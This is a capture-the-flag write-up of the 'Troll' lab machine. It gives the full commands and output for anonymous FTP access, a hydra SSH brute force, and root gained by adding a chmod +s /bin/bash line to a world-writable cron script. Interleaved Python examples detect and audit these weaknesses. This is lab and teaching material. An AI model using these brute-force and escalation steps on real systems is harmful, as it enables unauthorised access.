
Troll

Machine Information

Host discovery

  • target IP: 10.10.10.134

Information Gathering

Nmap Time

nmap -p- -T4 10.10.10.134 -A -oA 10.10.10.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 10:05 +08
Nmap scan report for 10.10.10.134
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.10.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:E4:24:24 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.11 ms 10.10.10.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.60 seconds

Exploiting Port 21

Since there's an FTP port open, I decided to look into that first.

ftp 10.10.10.134   
Connected to 10.10.10.134.
220 (vsFTPd 3.0.2)
Name (10.10.10.134:root): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||39461|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||56765|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |***********************************************************************************************************************************************************************************************|  8068        2.25 MiB/s    00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (1.58 MiB/s)

It seems there is only one file on the FTP server. I downloaded it and analyzed it.

It seems someone's FTP session was captured in the pcap file. Let me look into it and search for anything useful.

There is a reference to sup3rs3cr3tdirlol, which might be useful. Aside from that, there is nothing else of use, so I decided to move on to the next port.
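The reason the capture gives anything away at all is that FTP's control channel is plain text: every USER, PASS and path the client typed sits in the TCP payload. The following is an added example, not code from the post, that reads the classic libpcap format with only the standard library and pulls those lines out. The capture it parses is constructed in memory (addresses 10.0.0.12 and 10.0.0.5 and the commands are made up for the demonstration), so it does not reproduce the post's lol.pcap; point extract_ftp_commands() at the bytes of a real little-endian pcap to use it on one.

```python
"""Extract FTP control-channel lines from a pcap (stdlib only).

Added example, not from the original post. The capture below is constructed
in memory; real-world use would read the bytes of a little-endian classic pcap.
"""
import struct

def build_packet(src_ip, dst_ip, sport, dport, payload):
    """Construct a minimal Ethernet/IPv4/TCP frame around `payload`.
    Checksums are left at zero; the parser does not verify them."""
    eth = b"\x00" * 6 + b"\x00" * 6 + b"\x08\x00"             # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))),
                     bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp + payload

def build_pcap(frames):
    """Wrap raw frames in the classic libpcap file format (link type 1 = Ethernet)."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    body = b""
    for i, frame in enumerate(frames):
        body += struct.pack("<IIII", 1000 + i, 0, len(frame), len(frame)) + frame
    return header + body

def iter_frames(pcap_bytes):
    """Yield each captured frame from a little-endian classic pcap blob."""
    magic = struct.unpack("<I", pcap_bytes[:4])[0]
    assert magic == 0xA1B2C3D4, "only little-endian classic pcap is handled here"
    offset = 24                                                # fixed global header
    while offset + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack("<IIII", pcap_bytes[offset:offset + 16])
        offset += 16
        yield pcap_bytes[offset:offset + incl_len]
        offset += incl_len

def extract_ftp_commands(pcap_bytes, ftp_port=21):
    """Return (src, dst, line) for every text line seen on the FTP control port."""
    lines = []
    for frame in iter_frames(pcap_bytes):
        if frame[12:14] != b"\x08\x00":                       # not IPv4
            continue
        ip = frame[14:]
        total_len = struct.unpack("!H", ip[2:4])[0]
        ip = ip[:total_len]                                   # drop Ethernet padding
        if ip[9] != 6:                                         # not TCP
            continue
        ihl = (ip[0] & 0x0F) * 4
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if ftp_port not in (sport, dport) or not payload:
            continue
        for line in payload.decode("latin-1").splitlines():
            lines.append((src, dst, line))
    return lines

def find_credentials(lines):
    """Pick the USER and PASS arguments out of the control-channel lines."""
    creds = {}
    for _, _, line in lines:
        verb, _, arg = line.partition(" ")
        if verb.upper() in ("USER", "PASS"):
            creds[verb.upper()] = arg.strip()
    return creds

# Constructed sample session; not the post's capture.
SAMPLE_PCAP = build_pcap([
    build_packet("10.0.0.12", "10.0.0.5", 40000, 21, b"USER anonymous\r\n"),
    build_packet("10.0.0.5", "10.0.0.12", 21, 40000, b"331 Please specify the password.\r\n"),
    build_packet("10.0.0.12", "10.0.0.5", 40000, 21, b"PASS guest@example.com\r\n"),
    build_packet("10.0.0.5", "10.0.0.12", 21, 40000, b"230 Login successful.\r\n"),
    build_packet("10.0.0.12", "10.0.0.5", 40000, 21, b"RETR secret_stuff.txt\r\n"),
])

if __name__ == "__main__":
    session = extract_ftp_commands(SAMPLE_PCAP)
    for src, dst, line in session:
        print(f"{src} -> {dst}: {line}")
    print("credentials on the wire:", find_credentials(session))
```

The same walk over the packets is what Wireshark's "Follow TCP Stream" does interactively; the point for a defender is that anything served over plain FTP (or SFTP-less management traffic generally) should be assumed readable by whoever can capture it, and a capture file left on an anonymous share is as good as the session itself.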

Exploiting Port 80

Based on the information from the pcap, I suspected that sup3rs3cr3tdirlol might be a directory on the website. I then searched for it to see what more I could find.

After checking around, this is the only thing I found. I then looked at the given file to see what it is.

file roflmao    
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

It is an executable file. I then ran it to see what it does.

./roflmao 
Find address 0x0856BF to proceed

It is asking me to find an address. I then tried using the address as a directory name and checked.

It seems I found another hidden directory. I then looked into each one and searched for useful information. At the end of each directory there is a file that looks like credentials. I downloaded both and ran hydra to brute force SSH with the given files.

hydra -L which_one_lol.txt -P Pass.txt ssh://10.10.10.134
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-07 10:38:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:10/p:2), ~2 tries per task
[DATA] attacking ssh://10.10.10.134:22/
[22][ssh] host: 10.10.10.134   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-07 10:38:32

After including the password file's name as one of the candidate passwords, I got a credential that let me log in over SSH.
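A run like the one above is noisy on the server side: sshd logs one "Failed password" line per guess, followed by an "Accepted password" line for the hit, all from the same source within seconds. The following is an added example, not code from the post, that reads sshd lines in auth.log syslog format and flags any source that produces a burst of failures, marking separately whether a successful login followed the burst (the signal that a guess landed). The log lines are constructed for the example; only the user name overflow and the addresses 10.10.10.128 and 10.0.0.12 are taken from the post's output, and the host name troll, PIDs, ports and the other user names are made up.

```python
"""Flag SSH password guessing from sshd auth-log lines (stdlib only).

Added example, not from the original post. SAMPLE_AUTH_LOG is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Matches the syslog-format lines sshd writes for password authentication.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

SAMPLE_AUTH_LOG = """\
Feb  7 10:38:26 troll sshd[2101]: Failed password for invalid user admin from 10.10.10.128 port 51002 ssh2
Feb  7 10:38:26 troll sshd[2103]: Failed password for invalid user test from 10.10.10.128 port 51004 ssh2
Feb  7 10:38:27 troll sshd[2105]: Failed password for invalid user guest from 10.10.10.128 port 51006 ssh2
Feb  7 10:38:27 troll sshd[2107]: Failed password for overflow from 10.10.10.128 port 51008 ssh2
Feb  7 10:38:28 troll sshd[2109]: Failed password for root from 10.10.10.128 port 51010 ssh2
Feb  7 10:38:30 troll sshd[2111]: Accepted password for overflow from 10.10.10.128 port 51012 ssh2
Feb  7 11:02:11 troll sshd[2300]: Failed password for overflow from 10.0.0.12 port 42010 ssh2
Feb  7 11:02:40 troll sshd[2302]: Accepted password for overflow from 10.0.0.12 port 42012 ssh2
"""

def parse(log_text):
    """Return (timestamp, ip, user, accepted) tuples; unrelated lines are skipped.
    Syslog timestamps carry no year, so the parsed datetime is only used for deltas."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Return {ip: summary} for every source with >= threshold failed logins
    inside one window. success_after_burst is True when an accepted login
    from that source follows the burst, i.e. a guessed password worked."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        failures = [e for e in evs if not e[3]]
        burst_end = None
        # Slide a window of `threshold` consecutive failures over the timeline.
        for i in range(len(failures) - threshold + 1):
            span = (failures[i + threshold - 1][0] - failures[i][0]).total_seconds()
            if span <= window_seconds:
                burst_end = failures[i + threshold - 1][0]
                break
        if burst_end is None:
            continue
        alerts[ip] = {
            "failures": len(failures),
            "users": sorted({e[2] for e in failures}),
            "success_after_burst": any(e[3] and e[0] >= burst_end for e in evs),
        }
    return alerts

if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The single failed attempt from 10.0.0.12 followed by a success stays below the threshold and is not reported, which is the behaviour you want for a user mistyping a password once. Tools such as fail2ban apply the same per-source threshold to ban the address; key-only authentication removes the password-guessing surface altogether.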

ssh overflow@10.10.10.134 
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ED25519 key fingerprint is SHA256:jhpbgUldAKI9YAJOKhJZe9ypYt7GlEKUKU2WQ+zZBSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ED25519) to the list of known hosts.
overflow@10.10.10.134's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)

Privilege Escalation

Now that I have a shell, it is time for another round of information gathering for privilege escalation.

overflow@troll:/$ ls -la /var/log/cronlog 
-rwxrwxrwx 1 root root 23 Aug 13  2014 /var/log/cronlog
overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py

After looking around for a while, I found a cron log, and it seems to be executing a Python script. I then used pspy to confirm this and to locate cleaner.py.

2024/02/06 18:53:25 CMD: UID=0     PID=1      | /sbin/init
2024/02/06 18:54:01 CMD: UID=0     PID=18196  | /usr/bin/python /lib/log/cleaner.py 
2024/02/06 18:54:01 CMD: UID=0     PID=18195  | /bin/sh -c /usr/bin/python /lib/log/cleaner.py 
2024/02/06 18:54:01 CMD: UID=0     PID=18194  | CRON 
2024/02/06 18:54:01 CMD: UID=0     PID=18197  | sh -c rm -r /tmp/*  
2024/02/06 18:54:01 CMD: UID=0     PID=18198  | rm -r /tmp/pspy32s 

Using pspy, I saw that the cron job actually runs several things as root, including cleaner.py. I then checked whether it is readable or writable.

$ ls -la /lib/log/cleaner.py
-rwxrwxrwx 1 root root 96 Aug 13  2014 /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

Based on the result, I have read and write access to cleaner.py, and cron runs it as root. This means I could use it to get a root shell.

overflow@troll:/lib/log$ cat cleaner.py 
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
        os.system('chmod +s /bin/bash')
except:
        sys.exit()

I added a line that sets the SUID bit on /bin/bash, which gives me root once the script is executed as root.

$ ls -la /bin/bash
-rwsr-sr-x 1 root root 986672 Apr 23  2014 /bin/bash
$ /bin/bash -p
bash-4.3# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) egid=0(root) groups=0(root),1002(overflow)
bash-4.3# cd /root
bash-4.3# ls -la
total 28
drwx------  3 root root 4096 Aug 13  2014 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
-rw-------  1 root root    0 Aug 13  2014 .bash_history
-rw-r--r--  1 root root   58 Aug 10  2014 proof.txt
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4096 Aug 10  2014 .ssh
-rw-------  1 root root 5538 Aug 13  2014 .viminfo
bash-4.3# cat proof.txt 
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc
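Both halves of the escalation above are conditions a host audit can catch: a root cron entry whose script is world-writable (or not root-owned, or found by PATH lookup rather than an absolute path), and a setuid bit on a shell. The following is an added example, not code from the post, that checks for both. Because it must run unprivileged, build_fixture() creates a throwaway directory tree that mimics the post's /var/log/cronlog entry, the 0777 /lib/log/cleaner.py and the setuid /bin/bash; the cron entry text is the post's own, everything else about the fixture is constructed. On a real host you would feed audit_cron_entries() the contents of the system crontabs with trusted_uid=0 and point find_setuid_files() at / (the fixture passes your own uid, since you own the files it creates).

```python
"""Audit for root cron jobs running writable scripts and for setuid shells.

Added example, not from the original post. The directory tree built by
build_fixture() is a constructed stand-in for the post's host.
"""
import os
import stat
import tempfile

def parse_cron_commands(crontab_text):
    """Yield the command of each 5-field cron line (no user field, matching
    the post's /var/log/cronlog). Comments and VAR=value lines are skipped."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            yield fields[5]

def resolve_script(command, path_dirs):
    """Resolve the first word of a cron command against a PATH-like list."""
    first = command.split()[0]
    if os.path.isabs(first):
        return first if os.path.exists(first) else None
    for d in path_dirs:
        candidate = os.path.join(d, first)
        if os.path.exists(candidate):
            return candidate
    return None

def audit_cron_entries(crontab_text, path_dirs, trusted_uid=0):
    """Return (target, problem) findings. A script that cron runs as root must
    be owned by trusted_uid and must not be group- or world-writable."""
    findings = []
    for cmd in parse_cron_commands(crontab_text):
        script = resolve_script(cmd, path_dirs)
        if script is None:
            findings.append((cmd, "unresolved command: relies on PATH lookup"))
            continue
        st = os.stat(script)
        problems = []
        if st.st_uid != trusted_uid:
            problems.append(f"owned by uid {st.st_uid}")
        if st.st_mode & stat.S_IWOTH:
            problems.append("world-writable")
        elif st.st_mode & stat.S_IWGRP:
            problems.append("group-writable")
        if problems:
            findings.append((script, ", ".join(problems)))
    return findings

def find_setuid_files(root):
    """Walk `root` and return regular files with the setuid or setgid bit set."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(p)
    return sorted(hits)

def build_fixture():
    """Constructed stand-in for the post's host: (cronlog_text, path_dirs, root)."""
    root = tempfile.mkdtemp(prefix="troll_audit_")
    libdir = os.path.join(root, "lib", "log")
    bindir = os.path.join(root, "bin")
    os.makedirs(libdir)
    os.makedirs(bindir)
    cleaner = os.path.join(libdir, "cleaner.py")
    with open(cleaner, "w") as f:
        f.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
    os.chmod(cleaner, 0o777)            # -rwxrwxrwx, as shown in the post
    shell = os.path.join(bindir, "bash")
    with open(shell, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(shell, 0o4755)             # setuid bit, as the modified cleaner.py set it
    return "*/2 * * * * cleaner.py\n", [libdir, bindir], root

def run_audit(trusted_uid=None):
    """Run both checks against the fixture; defaults trusted_uid to the caller."""
    cron_text, path_dirs, root = build_fixture()
    uid = os.getuid() if trusted_uid is None else trusted_uid
    return {"cron": audit_cron_entries(cron_text, path_dirs, trusted_uid=uid),
            "setuid": find_setuid_files(root)}

if __name__ == "__main__":
    for kind, items in run_audit().items():
        print(kind, items)
```

The fix on the host side is the mirror image of the findings: make /lib/log/cleaner.py root-owned with mode 0755 or tighter, reference it by absolute path in the crontab, and keep a baseline of expected setuid files so that a shell acquiring the bit shows up as a diff.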

Things I learned from the machine

  • CRONJOB is fun
This post is licensed under CC BY 4.0 by the author.
